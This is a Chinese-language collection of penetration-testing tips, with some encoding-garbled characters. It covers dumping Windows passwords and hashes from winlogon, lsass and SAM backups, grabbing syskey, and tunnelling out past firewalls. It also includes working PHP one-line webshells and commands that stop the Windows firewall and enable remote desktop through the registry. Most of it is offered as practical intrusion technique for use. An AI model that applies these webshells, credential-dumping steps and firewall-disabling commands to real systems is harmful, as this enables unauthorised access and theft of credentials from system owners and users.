滲透測試筆記主要為一些短小但又精華的滲透小技巧，旨在與小伙伴們分享學習心得。為保證質量，每一篇為20條左右的滲透小記。

[[110986]]

1、在win系統(tǒng)中，控制用戶登陸的系統(tǒng)進程是“winlogon.exe”，系統(tǒng)在每一個用戶登陸時都會產(chǎn)生一個“winlogon.exe”進程。通過查找這個進程訪問的內(nèi)存模塊，可以獲得保存在內(nèi)存中的用戶名和密碼。

2、“Lsass.exe”是win下一個必不可少的進程，屬于微軟win系統(tǒng)中安全機制的相關進程，此進程主要用于本地安全和登陸策略，同時也管理域IP相關的安全信息。可用LSASecretsView這個軟件破之。

3、上手的時候，先搜搜有沒有備份好的SAM文件。例如管理員經(jīng)常將重要的文件備份在c:\windows\repair或是c:\windows\backup下，如果找到，將省去大半的功夫。

4、有經(jīng)驗的管理員會使用C:\Windows\System32\syskey.exe這個小工具來對系統(tǒng)密碼做雙重加密，像bios密碼一樣加多一次防護。

5、跟SAM文件的防護機制一樣，syskey.exe這個小工具也會生成一個類似的文件叫做system。也在c:\windows\system32\config目錄下。可用SAMInside軟件附帶的一個小工具GetSyskey.exe來抓取syskey。

6、對方開放42端口要特別留意，可能啟用了WINS服務，進一步說明背后可能有著復雜的內(nèi)網(wǎng)拓撲結構。

7、進行嗅探時，對網(wǎng)絡結構布局的了解是必須的，否則嗅探很可能會失敗。常見的VLAN類型有以下幾種：(1)基于端口的VLAN.(2)基于MAC地址的VLAN.(3)基于路由的VLAN.(4)基于策略的VLAN.

8、HTRAN、LCX等端口轉發(fā)出不來被墻的一個解決辦法猜想，可以看看對方的防火墻是什么牌子滴，下一個回來本地看看它升級的時候流量是從哪個端口出去的。(不過大型企業(yè)的防火墻都是在內(nèi)網(wǎng)的，服務器省級的….)

9、HTRAN、LCX轉發(fā)失敗，還可以嘗試的辦法是80端口復用，也就是HTTP隧道，這方面的工具有reDuh和tunnal(使用說明請戳這里)

10、使用wce_1.4.exe可以非常有效地抓取windows的哈希，如果不成功，可以嘗試以下兩點：(1)提升到system再次嘗試;(2)在非系統(tǒng)終端嘗試一下(webshell)

11、如果再不出來，在嘗試下PingTunnel(Ptunnel)和DnsTunnel(DNS2tcp)，如果不行，那就只好360你好，360再見了…….<(￣)￣)>

12、linux主機傳二進制文件的幾個方法:scp/sftp/ftp/tftp/wget

13、簡便執(zhí)行命令的PHP一句話(當然，很多網(wǎng)站都會把system函數(shù)給禁了)：

<?php echo '<pre>';system($_GET['cmd']); echo '</pre>'; ?>    #用法xxx.php?cmd=whoami 

14、一句話上傳不上去?不妨試試這個：

<?php $_GET[a]($_GET[b]);?>          #利用方法：xxx.php?a=assert&b=${phpinfo()}; 

15、在windows執(zhí)行命令時，遇到空格用“”括起來就可以執(zhí)行，例子如下：

net stop windows" "firewall  
net stop Windows" "Firewall/Internet" "Connection" "Sharing" "(ICS) 

16、干掉IPSEC后仍然無法連接3389，就可以用到antifw工具，自動停止IIS將3389轉到80上，本工具介紹請參見本站文章

17、命令行下查看3389遠程桌面信息：

(1)查看遠程桌面有沒有開啟：

net start | find "Remote Desktop Services"         #win7、win2008  
net start | find "Terminal Services "                     #win xp、win2003 

或是

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections 

如是0×0，則可以連接，考慮是否有tcp過濾或者防火墻了;如果沒有打開為0×1。

(2)查看遠程桌面連接所開的端口是多少：

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "ServerWinStationsRDP-Tcp /v PortNumber 

一般默認顯示是0xd3d ， 也就是3389。

18、命令行下開啟3389：

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 

win7親測可用。

19、一些網(wǎng)站的網(wǎng)頁沒有擴展名，或者只出現(xiàn).html的靜態(tài)網(wǎng)頁的拓展名。判斷此類網(wǎng)站用的什么技術，需要從幾方面分析：

方法(1)：

查看該網(wǎng)站的開發(fā)開放平臺。

a.比如：GOOGLE有個GoogleCode，里面提供GOOGLE各種Search Engine API，還有GoogleAJAX。那么GOOGLE提供的API全是JAVA的(全無PHP，ASP等)，由此可以判斷GOOGLE必定就是JSP。

c.再比如：去維基百科，當你點到某些提交信息的按鈕時候，IE的狀態(tài)欄(下方)會馬上呈現(xiàn)…php的拓展名。正常在地址欄上看不到.php的原因是，Wikipedia會把你提交信息后，轉到另一個.html頁面，而不會直接顯示那個.php頁面。

方法(2)：

學習JSP，PHP等相關技術，就能了解用這些技術開發(fā)的網(wǎng)站的特點，根據(jù)結構就可以判斷。

a.比如：校內(nèi)網(wǎng)，他們在招聘開發(fā)者只要求會JSP，Struts(JSPMVC的結構之一)。而且校內(nèi)大部分開放平臺開發(fā)的游戲都是JSP寫的，由此斷定，校內(nèi)就是用JSP的(其實校內(nèi)拓展名.do是典型的JSPStruts)。

b.比如：百度，從它貼吧，知道上提交模式，以及百度大部分拓展名都被隱藏(PHP網(wǎng)站經(jīng)常用apache里的功能來隱藏拓展名)來看，百度就是用PHP的。

方法(3)：

在該網(wǎng)站的招聘要求中，看看應聘網(wǎng)站后臺程序員，需要會什么語言。校內(nèi)網(wǎng)的招聘網(wǎng)頁，就是個好例(yin)子(dang)。